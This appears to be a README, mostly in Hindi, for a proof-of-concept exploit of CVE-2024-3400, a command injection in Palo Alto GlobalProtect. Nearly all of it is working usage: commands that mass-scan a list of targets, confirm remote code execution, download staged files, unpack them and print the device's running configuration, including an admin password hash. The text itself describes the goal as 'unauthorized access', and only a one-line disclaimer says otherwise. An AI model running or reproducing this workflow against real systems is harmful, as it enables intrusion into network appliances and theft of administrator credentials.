
CVE-2024-3400 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Palo Alto GlobalProtect में एक कमांड इंजेक्शन। लक्ष्यों को स्कैन करता है, RCE ट्रिगर करता है, और अनधिकृत पहुंच के लिए कॉन्फ़िगरेशन फ़ाइलें पुनर्प्राप्त करता है।
केवल शैक्षिक उद्देश्यों के लिए। केवल उन सर्वरों पर उपयोग करें जिनके परीक्षण की अनुमति आपके पास है।
आवश्यकताएं:
$ pip install rich
targets.txt स्कैन करें:
$ python run.py -f targets.txt -t 10
[-] Sending 102 requests...
[+] Requests sent. Writing check file...
[-] Polling 36...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.ir2qgg4yi5.js...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.xaxdtscd5r.js...
...
[-] Checking https://[hostname]/global-protect/portal/js/jquery.wtn5jvi7y1.js...
[+] Detected RCE: https://[hostname]/global-protect/portal/js/jquery.axfqashdsy.js
[-] Checking https://[hostname]/global-protect/portal/js/jquery.nibf1hcuf8.js...
[-] Sleeping...
ध्यान दें कि यह एक घंटे तक पुनः प्रयास करेगा। शायद हमें जितनी आवश्यकता है उससे अधिक, लेकिन यह ठीक है।
कॉन्फ़िग प्राप्त करें:
$ python get_data.py
Getting https://[hostname]/global-protect/portal/js/jquery.h2lcipjuz7.js...
Getting https://[hostname]/global-protect/portal/js/jquery.68395vb2u8.js...
Getting https://[hostname]/global-protect/portal/js/jquery.ig3sug78m1.js...
...
Getting https://[hostname]/global-protect/portal/js/jquery.w6ty44a6yr.js...
$ mv jquery.w6ty44a6yr.js [hostname].tar.gz
$ tar -xf [hostname].tar.gz
$ cat opt/pancfg/mgmt/saved-configs/running-config.xml
<?xml version="1.0"?>
<config version="11.0.0" urldb="paloaltonetworks" detail-version="11.0.2">
<mgt-config>
<users>
<entry name="admin">
<phash>$5$jwgqcoyx$9...
...
https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan
https://github.com/h4x0r-dz/CVE-2024-3400
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/